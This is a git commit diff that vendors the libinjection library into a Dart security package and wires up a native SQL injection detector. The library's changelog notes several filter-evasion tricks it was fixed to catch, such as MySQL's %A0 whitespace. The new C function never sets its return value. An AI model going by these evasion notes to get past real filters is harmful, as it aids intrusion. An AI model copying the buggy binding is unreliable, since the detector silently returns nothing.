Roll libinjection
This commit is contained in:
parent
7c3a81ffd4
commit
17224d011a
623 changed files with 211930 additions and 10 deletions
|
@ -1,26 +1,313 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<project version="4">
|
||||
<component name="CMakeRunConfigurationManager" shouldGenerate="true" shouldDeleteObsolete="true">
|
||||
<generated>
|
||||
<config projectName="angel_security" targetName="angel_security_native" />
|
||||
<config projectName="angel_security" targetName="injection" />
|
||||
</generated>
|
||||
</component>
|
||||
<component name="CMakeSettings">
|
||||
<configurations>
|
||||
<configuration PROFILE_NAME="Debug" CONFIG_NAME="Debug" />
|
||||
</configurations>
|
||||
</component>
|
||||
<component name="ChangeListManager">
|
||||
<list default="true" id="196df338-9e5c-49f9-ba32-c75ccea34c48" name="Default Changelist" comment="">
|
||||
<change afterPath="$PROJECT_DIR$/libinjection/src/CMakeLists.txt" afterDir="false" />
|
||||
<change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
|
||||
<change beforePath="$PROJECT_DIR$/CMakeLists.txt" beforeDir="false" afterPath="$PROJECT_DIR$/CMakeLists.txt" afterDir="false" />
|
||||
<change beforePath="$PROJECT_DIR$/cmake_dart_utils" beforeDir="false" afterPath="$PROJECT_DIR$/cmake_dart_utils" afterDir="false" />
|
||||
<change beforePath="$PROJECT_DIR$/cmake_dart_utils/example/lib/sample_extension.dart" beforeDir="false" afterPath="$PROJECT_DIR$/cmake_dart_utils/example/lib/sample_extension.dart" afterDir="false" />
|
||||
<change beforePath="$PROJECT_DIR$/lib/src/native/angel_security.cc" beforeDir="false" afterPath="$PROJECT_DIR$/lib/src/native/angel_security.c" afterDir="false" />
|
||||
<change beforePath="$PROJECT_DIR$/lib/src/native/native.dart" beforeDir="false" afterPath="$PROJECT_DIR$/lib/src/native/native.dart" afterDir="false" />
|
||||
</list>
|
||||
<ignored path="$PROJECT_DIR$/cmake-build-debug/" />
|
||||
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
|
||||
<option name="SHOW_DIALOG" value="false" />
|
||||
<option name="HIGHLIGHT_CONFLICTS" value="true" />
|
||||
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
|
||||
<option name="LAST_RESOLUTION" value="IGNORE" />
|
||||
</component>
|
||||
<component name="ExecutionTargetManager" SELECTED_TARGET="CMakeBuildProfile:Debug" />
|
||||
<component name="FileEditorManager">
|
||||
<leaf>
|
||||
<file pinned="false" current-in-tab="true">
|
||||
<entry file="file://$PROJECT_DIR$/lib/src/native/angel_security.c">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="207">
|
||||
<caret line="44" column="45" selection-start-line="44" selection-start-column="45" selection-end-line="44" selection-end-column="45" />
|
||||
<folding>
|
||||
<element signature="e#0#21#0" expanded="true" />
|
||||
</folding>
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
</file>
|
||||
<file pinned="false" current-in-tab="false">
|
||||
<entry file="file:///usr/local/Cellar/dart/2.5.0-dev.1.0/libexec/include/dart_api.h">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="142">
|
||||
<caret line="2046" column="24" selection-start-line="2046" selection-start-column="24" selection-end-line="2046" selection-end-column="24" />
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
</file>
|
||||
<file pinned="false" current-in-tab="false">
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/CMakeLists.txt">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="17">
|
||||
<caret line="1" column="19" selection-start-line="1" selection-start-column="19" selection-end-line="1" selection-end-column="19" />
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
</file>
|
||||
</leaf>
|
||||
</component>
|
||||
<component name="Git.Settings">
|
||||
<option name="RECENT_GIT_ROOT_PATH" value="$PROJECT_DIR$" />
|
||||
</component>
|
||||
<component name="IdeDocumentHistory">
|
||||
<option name="CHANGED_PATHS">
|
||||
<list>
|
||||
<option value="$PROJECT_DIR$/lib/src/native/angel_security.cc" />
|
||||
<option value="$PROJECT_DIR$/CMakeLists.txt" />
|
||||
<option value="$PROJECT_DIR$/libinjection/src/CMakeLists.txt" />
|
||||
<option value="$PROJECT_DIR$/lib/src/native/angel_security.c" />
|
||||
</list>
|
||||
</option>
|
||||
</component>
|
||||
<component name="ProjectFrameBounds">
|
||||
<option name="x" value="180" />
|
||||
<option name="y" value="23" />
|
||||
<option name="width" value="1155" />
|
||||
<option name="height" value="766" />
|
||||
</component>
|
||||
<component name="ProjectLevelVcsManager" settingsEditedManually="true" />
|
||||
<component name="ProjectView">
|
||||
<navigator proportions="" version="1">
|
||||
<foldersAlwaysOnTop value="true" />
|
||||
</navigator>
|
||||
<panes>
|
||||
<pane id="Scope" />
|
||||
<pane id="ProjectPane">
|
||||
<subPane>
|
||||
<expand>
|
||||
<path>
|
||||
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
|
||||
<item name="security" type="462c0819:PsiDirectoryNode" />
|
||||
</path>
|
||||
<path>
|
||||
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
|
||||
<item name="security" type="462c0819:PsiDirectoryNode" />
|
||||
<item name="lib" type="462c0819:PsiDirectoryNode" />
|
||||
</path>
|
||||
<path>
|
||||
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
|
||||
<item name="security" type="462c0819:PsiDirectoryNode" />
|
||||
<item name="lib" type="462c0819:PsiDirectoryNode" />
|
||||
<item name="src" type="462c0819:PsiDirectoryNode" />
|
||||
</path>
|
||||
<path>
|
||||
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
|
||||
<item name="security" type="462c0819:PsiDirectoryNode" />
|
||||
<item name="lib" type="462c0819:PsiDirectoryNode" />
|
||||
<item name="src" type="462c0819:PsiDirectoryNode" />
|
||||
<item name="native" type="462c0819:PsiDirectoryNode" />
|
||||
</path>
|
||||
</expand>
|
||||
<select />
|
||||
</subPane>
|
||||
</pane>
|
||||
</panes>
|
||||
</component>
|
||||
<component name="PropertiesComponent">
|
||||
<property name="SHARE_PROJECT_CONFIGURATION_FILES" value="true" />
|
||||
<property name="WebServerToolWindowFactoryState" value="false" />
|
||||
<property name="cf.advertisement.text.overridden" value="true" />
|
||||
<property name="nodejs_interpreter_path.stuck_in_default_project" value="undefined stuck path" />
|
||||
<property name="nodejs_npm_path_reset_for_default_project" value="true" />
|
||||
<property name="settings.editor.selected.configurable" value="project.propVCSSupport.Mappings" />
|
||||
</component>
|
||||
<component name="RunManager">
|
||||
<component name="RunDashboard">
|
||||
<option name="ruleStates">
|
||||
<list>
|
||||
<RuleState>
|
||||
<option name="name" value="ConfigurationTypeDashboardGroupingRule" />
|
||||
</RuleState>
|
||||
<RuleState>
|
||||
<option name="name" value="StatusDashboardGroupingRule" />
|
||||
</RuleState>
|
||||
</list>
|
||||
</option>
|
||||
</component>
|
||||
<component name="RunManager" selected="CMake Application.angel_security_native">
|
||||
<configuration name="angel_security_native" type="CMakeRunConfiguration" factoryName="Application" PASS_PARENT_ENVS_2="true" PROJECT_NAME="angel_security" TARGET_NAME="angel_security_native" CONFIG_NAME="Debug">
|
||||
<method v="2">
|
||||
<option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
|
||||
</method>
|
||||
</configuration>
|
||||
<configuration name="injection" type="CMakeRunConfiguration" factoryName="Application" PASS_PARENT_ENVS_2="true" PROJECT_NAME="angel_security" TARGET_NAME="injection" CONFIG_NAME="Debug">
|
||||
<method v="2">
|
||||
<option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
|
||||
</method>
|
||||
</configuration>
|
||||
<list>
|
||||
<item itemvalue="CMake Application.angel_security_native" />
|
||||
<item itemvalue="CMake Application.injection" />
|
||||
</list>
|
||||
</component>
|
||||
<component name="SvnConfiguration">
|
||||
<configuration />
|
||||
</component>
|
||||
<component name="TaskManager">
|
||||
<task active="true" id="Default" summary="Default task">
|
||||
<changelist id="196df338-9e5c-49f9-ba32-c75ccea34c48" name="Default Changelist" comment="" />
|
||||
<created>1565965399486</created>
|
||||
<option name="number" value="Default" />
|
||||
<option name="presentableId" value="Default" />
|
||||
<updated>1565965399486</updated>
|
||||
<workItem from="1565965401738" duration="952000" />
|
||||
</task>
|
||||
<servers />
|
||||
</component>
|
||||
<component name="TimeTrackingManager">
|
||||
<option name="totallyTimeSpent" value="952000" />
|
||||
</component>
|
||||
<component name="ToolWindowManager">
|
||||
<frame x="180" y="23" width="1155" height="766" extended-state="0" />
|
||||
<editor active="true" />
|
||||
<layout>
|
||||
<window_info id="Favorites" side_tool="true" />
|
||||
<window_info content_ui="combo" id="Project" order="0" weight="0.2884097" />
|
||||
<window_info id="Structure" order="1" side_tool="true" weight="0.25" />
|
||||
<window_info anchor="bottom" id="Tool Output" />
|
||||
<window_info anchor="bottom" id="Database Changes" />
|
||||
<window_info anchor="bottom" id="Version Control" />
|
||||
<window_info anchor="bottom" id="Terminal" />
|
||||
<window_info active="true" anchor="bottom" id="Messages" visible="true" weight="0.32937685" />
|
||||
<window_info anchor="bottom" id="Event Log" side_tool="true" />
|
||||
<window_info anchor="bottom" id="ANTLR Preview" />
|
||||
<window_info anchor="bottom" id="CMake" weight="0.32937685" />
|
||||
<window_info anchor="bottom" id="Message" order="0" />
|
||||
<window_info anchor="bottom" id="Find" order="1" />
|
||||
<window_info anchor="bottom" id="Run" order="2" />
|
||||
<window_info anchor="bottom" id="Debug" order="3" weight="0.4" />
|
||||
<window_info anchor="bottom" id="Cvs" order="4" weight="0.25" />
|
||||
<window_info anchor="bottom" id="Inspection" order="5" weight="0.4" />
|
||||
<window_info anchor="bottom" id="TODO" order="6" />
|
||||
<window_info anchor="right" id="Database" />
|
||||
<window_info anchor="right" id="make" />
|
||||
<window_info anchor="right" id="Commander" order="0" weight="0.4" />
|
||||
<window_info anchor="right" id="Ant Build" order="1" weight="0.25" />
|
||||
<window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25" />
|
||||
</layout>
|
||||
</component>
|
||||
<component name="TypeScriptGeneratedFilesManager">
|
||||
<option name="version" value="1" />
|
||||
</component>
|
||||
<component name="VcsManagerConfiguration">
|
||||
<ignored-roots>
|
||||
<path value="$PROJECT_DIR$/libinjection" />
|
||||
</ignored-roots>
|
||||
</component>
|
||||
<component name="editorHistoryManager">
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_xss.h">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="204">
|
||||
<caret line="12" lean-forward="true" selection-start-line="12" selection-end-line="12" />
|
||||
<folding>
|
||||
<element signature="e#251#252#0" expanded="true" />
|
||||
</folding>
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_xss.c">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="162">
|
||||
<caret line="24" lean-forward="true" selection-start-line="24" selection-end-line="24" />
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_html5.h">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="124">
|
||||
<caret line="32" column="16" lean-forward="true" selection-start-line="32" selection-start-column="16" selection-end-line="32" selection-end-column="16" />
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/lib/src/native/native.dart">
|
||||
<provider selected="true" editor-type-id="text-editor" />
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/CMakeLists.txt">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="136">
|
||||
<caret line="8" column="53" selection-start-line="8" selection-start-column="53" selection-end-line="8" selection-end-column="53" />
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_sqli.c">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="188">
|
||||
<caret line="19" lean-forward="true" selection-start-line="19" selection-end-line="19" />
|
||||
<folding>
|
||||
<element signature="e#158#177#0" expanded="true" />
|
||||
</folding>
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_sqli_data.h">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="51">
|
||||
<caret line="3" lean-forward="true" selection-start-line="3" selection-end-line="3" />
|
||||
<folding>
|
||||
<element signature="e#68#93#0" expanded="true" />
|
||||
</folding>
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_sqli.h">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="255">
|
||||
<caret line="15" lean-forward="true" selection-start-line="15" selection-end-line="15" />
|
||||
<folding>
|
||||
<element signature="e#235#247#0" expanded="true" />
|
||||
</folding>
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection.h">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="153">
|
||||
<caret line="9" column="22" lean-forward="true" selection-start-line="9" selection-start-column="22" selection-end-line="9" selection-end-column="22" />
|
||||
<folding>
|
||||
<element signature="e#223#311#0" expanded="true" />
|
||||
</folding>
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/libinjection/src/CMakeLists.txt">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="17">
|
||||
<caret line="1" column="19" selection-start-line="1" selection-start-column="19" selection-end-line="1" selection-end-column="19" />
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file:///usr/local/Cellar/dart/2.5.0-dev.1.0/libexec/include/dart_api.h">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="142">
|
||||
<caret line="2046" column="24" selection-start-line="2046" selection-start-column="24" selection-end-line="2046" selection-end-column="24" />
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
<entry file="file://$PROJECT_DIR$/lib/src/native/angel_security.c">
|
||||
<provider selected="true" editor-type-id="text-editor">
|
||||
<state relative-caret-position="207">
|
||||
<caret line="44" column="45" selection-start-line="44" selection-start-column="45" selection-end-line="44" selection-end-column="45" />
|
||||
<folding>
|
||||
<element signature="e#0#21#0" expanded="true" />
|
||||
</folding>
|
||||
</state>
|
||||
</provider>
|
||||
</entry>
|
||||
</component>
|
||||
</project>
|
|
@ -3,4 +3,8 @@ project(angel_security)
|
|||
set(CMAKE_EXPORT_COMPILE_COMMANDS ON)
|
||||
list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_LIST_DIR}/cmake_dart_utils/cmake")
|
||||
find_package(Dart REQUIRED)
|
||||
add_dart_native_extension(angel_security_native lib/src/native/angel_security.cc)
|
||||
include_directories(libinjection/src)
|
||||
add_subdirectory(libinjection/src)
|
||||
add_dart_native_extension(angel_security_native lib/src/native/angel_security.c)
|
||||
target_link_libraries(angel_security_native injection)
|
||||
install(TARGETS angel_security_native LIBRARY DESTINATION "${CMAKE_CURRENT_LIST_DIR}/lib/src")
|
|
@ -1,4 +1,7 @@
|
|||
#include <dart_api.h>
|
||||
#include <libinjection.h>
|
||||
#include <libinjection_sqli.h>
|
||||
#include <stdbool.h>
|
||||
#include <string.h>
|
||||
|
||||
Dart_NativeFunction ResolveName(Dart_Handle name, int argc,
|
||||
|
@ -23,10 +26,24 @@ Dart_Handle HandleError(Dart_Handle handle) {
|
|||
}
|
||||
|
||||
void Angel_Security_IsSqli(Dart_NativeArguments arguments) {
|
||||
char* text;
|
||||
HandleError();
|
||||
Dart_Handle result = HandleError(Dart_NewInteger(rand()));
|
||||
Dart_SetReturnValue(arguments, result);
|
||||
const char *text;
|
||||
Dart_Handle textHandle = Dart_GetNativeArgument(arguments, 0);
|
||||
HandleError(Dart_StringToCString(textHandle, &text));
|
||||
|
||||
struct libinjection_sqli_state state;
|
||||
libinjection_sqli_init(&state, text, strlen(text), FLAG_NONE);
|
||||
int is_sqli = libinjection_is_sqli(&state);
|
||||
|
||||
// Return list
|
||||
Dart_Handle outHandle = Dart_NewList(2);
|
||||
if (is_sqli != 0) {
|
||||
HandleError(Dart_ListSetAt(outHandle, 0, Dart_NewBoolean(true)));
|
||||
HandleError(Dart_ListSetAt(outHandle, 1,
|
||||
Dart_NewStringFromCString(state.fingerprint)));
|
||||
} else {
|
||||
HandleError(Dart_ListSetAt(outHandle, 0, Dart_NewBoolean(false)));
|
||||
HandleError(Dart_ListSetAt(outHandle, 1, Dart_Null()));
|
||||
}
|
||||
}
|
||||
|
||||
Dart_NativeFunction ResolveName(Dart_Handle name, int argc,
|
|
@ -1,5 +1,3 @@
|
|||
import 'dart-ext:angel_security_native';
|
||||
|
||||
/// Using `libinjection`, determines whether a string contains
|
||||
/// a SQL injection.
|
||||
bool isSqli(String text) native "Angel_Security_IsSqli";
|
||||
import 'package:angel_framework/angel_framework.dart';
|
||||
part 'sqli.dart';
|
||||
|
|
17
lib/src/native/sqli.dart
Normal file
17
lib/src/native/sqli.dart
Normal file
|
@ -0,0 +1,17 @@
|
|||
part of 'native.dart';
|
||||
|
||||
List _isSqli(String text) native "Angel_Security_IsSqli";
|
||||
|
||||
/// Using `libinjection`, determines whether a string contains
|
||||
/// a SQL injection.
|
||||
LibInjectionScore sqlInjectionScore(String text) {
|
||||
var result = _isSqli(text);
|
||||
return LibInjectionScore(result[0] as bool, result[1] as String);
|
||||
}
|
||||
|
||||
class LibInjectionScore {
|
||||
final bool isInjection;
|
||||
final String signature;
|
||||
|
||||
LibInjectionScore(this.isInjection, [this.signature]);
|
||||
}
|
46
libinjection/.gitignore
vendored
Normal file
46
libinjection/.gitignore
vendored
Normal file
|
@ -0,0 +1,46 @@
|
|||
*~
|
||||
*.pyc
|
||||
*.dSYM
|
||||
c/#*
|
||||
*.plist
|
||||
*.info
|
||||
*.gch
|
||||
*.gcov
|
||||
|
||||
# gnu autotest
|
||||
*.trs
|
||||
|
||||
#aclocal.m4
|
||||
app.info
|
||||
autom4te.cache
|
||||
#compile
|
||||
config.h
|
||||
#config.h.in
|
||||
#config.guess
|
||||
config.log
|
||||
config.status
|
||||
#config.sub
|
||||
#configure
|
||||
configure.scan
|
||||
coverage_report
|
||||
#depcomp
|
||||
#install-sh
|
||||
#libtool
|
||||
#ltmain.sh
|
||||
#Makefile.in
|
||||
#m4
|
||||
#missing
|
||||
stamp-h1
|
||||
*~
|
||||
*.html
|
||||
*.log
|
||||
*.o
|
||||
*.la
|
||||
*.so*
|
||||
*.a
|
||||
.deps
|
||||
*.tar*
|
||||
*.zip
|
||||
*.lo
|
||||
*.gcno
|
||||
*.gcda
|
14
libinjection/.travis.yml
Normal file
14
libinjection/.travis.yml
Normal file
|
@ -0,0 +1,14 @@
|
|||
sudo: required
|
||||
dist: trusty
|
||||
|
||||
language: generic
|
||||
|
||||
services:
|
||||
- docker
|
||||
|
||||
before_install:
|
||||
- docker pull nickg/libinjection-docker
|
||||
|
||||
script:
|
||||
- docker run -e COVERALLS_REPO_TOKEN=$COVERALLS_REPO_TOKEN -v $HOME/build/client9/libinjection:/build -w /build nickg/libinjection-docker ./make-ci.sh
|
||||
|
2
libinjection/CHANGELOG
Normal file
2
libinjection/CHANGELOG
Normal file
|
@ -0,0 +1,2 @@
|
|||
see CHANGELOG.md
|
||||
|
288
libinjection/CHANGELOG.md
Normal file
288
libinjection/CHANGELOG.md
Normal file
|
@ -0,0 +1,288 @@
|
|||
# NEXT
|
||||
|
||||
* [#126](/client9/libinjection/issues/126) oracle false negative
|
||||
* [#117](/client9/libinjection/issues/117) [#116](/client9/libinjection/issues/116) - overread in XSS
|
||||
* [#112](/client9/libinjection/issues/112) fix shared library on macOS
|
||||
* [#122](/client9/libinjection/issues/122) [#115](/client9/libinjection/issues/115) - false positive issue for XSS
|
||||
* [#113](/client9/libinjection/issues/113) save space in struct
|
||||
* [#126](/client9/libinjection/issues/126) add usage to sqli cli tool
|
||||
* [#125](/client9/libinjection/issues/125) many false positives
|
||||
* [#114](/client9/libinjection/issues/114) false negative with TSQL and "IF NOT" operation
|
||||
|
||||
# v3.9.2 - 2016-05-21
|
||||
|
||||
* Release of whatever changes have been made over the last 2.5 years.
|
||||
|
||||
# v3.9.1 - 2013-12-26
|
||||
|
||||
Day-After-Christmas Edition
|
||||
|
||||
* No functional changes
|
||||
* Code reverted to strict C90 style to allow builds on embedded systems, Windows and FreeBSD
|
||||
* For gcc this means `-std=c90 -pedantic`, which seems to simulate Windows behavior on Linux
|
||||
* Other minor style changes to header files.
|
||||
|
||||
|
||||
# v3.9.0 - 2013-11-29
|
||||
|
||||
Black Friday Edition
|
||||
|
||||
* Big API Change!! everything in `libinjection.h` is now `libinjection_sqli.h`. And a new super simple API is in `libinjection.h`
|
||||
* Improvements to folder to prevent bypasses using SQL types (casts). This eliminated about 400 fingerprints as well.
|
||||
* Blacklisted a very degenerate MySQL ODBC case, that is highly unlike to be used in 'real inputs'. thanks to @LightOS foreporting.. not clear who found it originally.
|
||||
* Over 400 unit tests now!
|
||||
* Compiles clean under clang with `-Weverything -Wno-padded` `-Wno-padded` is excluded since it's architecture dependant. See `clang.sh` to see how to invoke.
|
||||
* PHP documentation fixes, thanks @LightOS
|
||||
|
||||
# v3.8.0 - 2013-10-18
|
||||
|
||||
LAMP Special Edition: MySQL and PHP improvements
|
||||
|
||||
* [Issue #33](https://github.com/client9/libinjection/issues/54) Fixes MySQL in latin1-mode use of `%A0` as whitespace. This was tricky since `%A0` might be part of larger UTF-8 encoding as well. Or perhaps `%C2%A0` (utf-8 encoding) might be treated as whitespace. Fortunately, MySQL only seems to treat `%A0` as whitespace in latin1 mode. HT [@ru_raz0r](https://twitter.com/ru_raz0r)
|
||||
* Fixes to Lua testdriver and portability fixes
|
||||
* Much improved PHP build and test. It now uses `phpize` and builds and tests like a real module.
|
||||
* API CHANGE: the macro `LIBINJECTION_VERSION` has been replaced by `const char* libinjection_version()`. This allows us to increment the version number without having to regenerate SWIG (or other) bindings for minor releases.
|
||||
|
||||
NOTE:
|
||||
Pregenerated [SWIG](http://www.swig.org/) bindings are removed. You'll need to install SWIG before running `make`. SWIG is packaged on virtually every OS so this should not be a problem.
|
||||
|
||||
Here's why:
|
||||
|
||||
* Latest versions of swig appear to generate poor quality bindings for LUA and Python. Bugs are filed upstream [1341](https://sourceforge.net/p/swig/bugs/1341/), [1343](https://sourceforge.net/p/swig/bugs/1343/), [1345](https://sourceforge.net/p/swig/bugs/1345/). These are fixed or will be fixed in swig 3.0.0.
|
||||
* In addition, I've received a number of reports of generated code failing various static analysis
|
||||
* I can't triangulate which SWIG for which language for which OS will work for you
|
||||
* I may be switching to [libffi](http://cffi.readthedocs.org/) for python, and [luajit.ffi](http://luajit.org/ext_ffi.html) for lua(jit) in the future, anyways.
|
||||
|
||||
# v3.7.1 -- 2013-10-13
|
||||
|
||||
* Remove un-needed code
|
||||
|
||||
# v3.7.0 -- 2013-10-13
|
||||
|
||||
Major Release
|
||||
|
||||
* [Issue #54](https://github.com/client9/libinjection/issues/54): Add test vectors from [Arne Swinnen](http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/). Thanks [qerub@github](https://github.com/qerub)
|
||||
* Minor fingerprint update for [Issue #54](https://github.com/client9/libinjection/issues/54). I don't really think it's valid SQL but it's safe enough to detect without false positives.
|
||||
* [Issue #55](https://github.com/client9/libinjection/issues/55): Parse MS SQLSERVER use of \[brackets\] for column and table names. This is a big one that closes a lot of holes. Thanks [nroggle@github](https://github.com/nroggel)
|
||||
* [Issue #56](https://github.com/client9/libinjection/issues/56): fix buffer over-read. Thanks [safe3@github](https://github.com/Safe3) and [flily@github](https://github.com/flily)
|
||||
* Remove use of `-fstack-protector` as it breaks valgrind detecting memory problems
|
||||
Read more about it http://blog.client9.com/2013/10/12/gcc-valgrind-stackprotector.html
|
||||
* Fixed folding issue where `1,-sin(1))` would be folded as `1 (1)`
|
||||
* Add more test cases and improved test coverage to [98.8%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
|
||||
# v3.6.0 -- 2013-09-11
|
||||
* New PHP API
|
||||
* Big fingerprint update
|
||||
** about 500 new fingerprints added based on fuzzing tests by Reto Ischi
|
||||
** about 700 impossible, dead fingerprints removed
|
||||
** adding folding rule for "sqltype sqltype -> sqltype" since
|
||||
`select binary binary binary 1` is valid
|
||||
* Other minor fingerprints added
|
||||
* -maybe- API change as typedefs and structs were re-arranged for SWIG
|
||||
|
||||
# v3.5.3 -- 2013-08-25
|
||||
* Fingerprint update -- `BETWEEN` operation bypasses
|
||||
* Fingerprint update -- `ANY/SOME` quasi-function bypasses
|
||||
* Fixed issue with folding where `1-(2-3)` would fold to "nothing" instead of `1`
|
||||
* Improved test coverage to [98.0%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
* More adjustments to the PHP/MYSQL backtick to reduce false positives
|
||||
|
||||
# v3.5.2 -- 2013-08-21
|
||||
* Fingerprint update. Credit: Reto Ischi
|
||||
|
||||
# v3.5.1 -- 2013-08-21
|
||||
* found regression in handling of PHP/MySQL backticks. Tests added
|
||||
* Dead code removed.
|
||||
* Improved test coverage to [97.7%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
|
||||
# v3.5.0 -- 2013-08-21
|
||||
* Bug fix for libinjection_sqli_reset @brianrectanus
|
||||
https://github.com/client9/libinjection/pull/50
|
||||
* Non-critical parser fix for numbers with oracle's ending
|
||||
suffix. "SELECT 1FROM .." -> (SELECT, 1, FROM) not
|
||||
(SELECT, 1F, ROM)
|
||||
* Yet another fix for disambiguating Oracle's "f" suffix for numbers HT @LightOS
|
||||
* Better parsing of generated number forms of "10.e" and "10.10e"
|
||||
(these are actually table specifiers!) HT @LightOS
|
||||
* Change sizing of some static arrays to have a length >= 8
|
||||
For GCC based applications, this allows -fstack-protector to work
|
||||
and -Wstack-protector will now not emit errors.
|
||||
* Added '-fstack-protector-all -D_FORTIFY_SOURCE=2' to default CFLAGS.
|
||||
About 10% performance loss with -fstack-protector-all
|
||||
* Improvements in reducing false positives, HT modsecurity team
|
||||
* Add fingerprint, HT @FluxReiners
|
||||
* Support for parsing of old ODBC-style typing, e.g. 'select {foo 1};' (valid in MySQL)
|
||||
* Fix tokenization of "IF EXISTS(....", "IF NOT EXISTS(..."
|
||||
* Fi possible stack over-read, and improve detection of "sp_password" flag
|
||||
in short sqli HT modsecurity team
|
||||
|
||||
# v3.4.1 2013-07-18
|
||||
* Fingerprint update only HT @LightOS
|
||||
|
||||
# v3.4.0 2013-07-18
|
||||
|
||||
* Fix regression with COLLATE
|
||||
* Handle "procedure analyze" under MySQL
|
||||
* Make API most robust when setting flags
|
||||
* Add folding API
|
||||
* Add new all-C test driver to improve testing speed
|
||||
* Makefile cleanups
|
||||
* Fired Jenkins! Using in-house system.
|
||||
* Fixed bypass reported by @FluxReiners
|
||||
|
||||
# v3.3.0 2013-07-13
|
||||
|
||||
* change how backslash is handled to catch old MSSQL servers sqli
|
||||
See http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
|
||||
for details
|
||||
* Reworking of COLLATE to handle MySQL, TSQL types automatically
|
||||
* Handle bizarro world TSQL '\%1' which is parsed as "0 % 1"
|
||||
* Better stacked query detection, fixing some regressions
|
||||
* Folding improvements
|
||||
* False positive improvements
|
||||
|
||||
|
||||
# v3.2.0 2013-07-12
|
||||
|
||||
* Parse binary litterals "0b010101" used by at least mysql and pgsql
|
||||
* Add fingerprints '1&EUE', '1&EkU' to work around ambiguous parsing rules
|
||||
"-1.for" == '-1.f OR' vs. '-1. FOR' CREDIT @LightOS
|
||||
* Add parsing rules for COLLATION in MySQL, CREDIT @LightOS
|
||||
* Reduce false positives by removing all fingerprints that contained "sn"
|
||||
* Improvement in handling MySQL 'binary' quasi-operator/type
|
||||
* Improvements in folding
|
||||
* Removed dependency on SWIG for installing python module
|
||||
|
||||
# v3.1.0 2013-07-02
|
||||
|
||||
* Fix for parsing Oracle numeric literals
|
||||
* Fix for oracle whitespace with null char.
|
||||
* Add unusual SQL join types to keywords lists
|
||||
* Minor fixes to python API examples
|
||||
|
||||
# v3.0.0 2013-06-23
|
||||
|
||||
Big Release and Big Engine change. Highly recommend
|
||||
|
||||
* Numerous evasions and false positives fixed!
|
||||
* Tokenizer is now really dumb, and publically exposed. See `libinjection_sqli_tokenize`.
|
||||
* Folding engine completely rewritten to be simpler and easier to extend, debug, port.
|
||||
* MySQL `backticks` now handled correctly
|
||||
* @"var" and @'var' parsed correctly (mysql)
|
||||
* ":=" operator parsed correctly
|
||||
* non-ascii SQL variables and barewords handled correctly
|
||||
* less false positives and those that are false positives
|
||||
are more "indeterminate cases" and are only in a few
|
||||
fingerprints
|
||||
* autogeneration of fingerprints with trivial SQL variations
|
||||
* support for pgsql $ strings
|
||||
* support for oracle's q and nq strings
|
||||
* support for mysql's n strings
|
||||
* parsing stats exposed
|
||||
* new swig bindings for python and lua, with callbacks into original scripting
|
||||
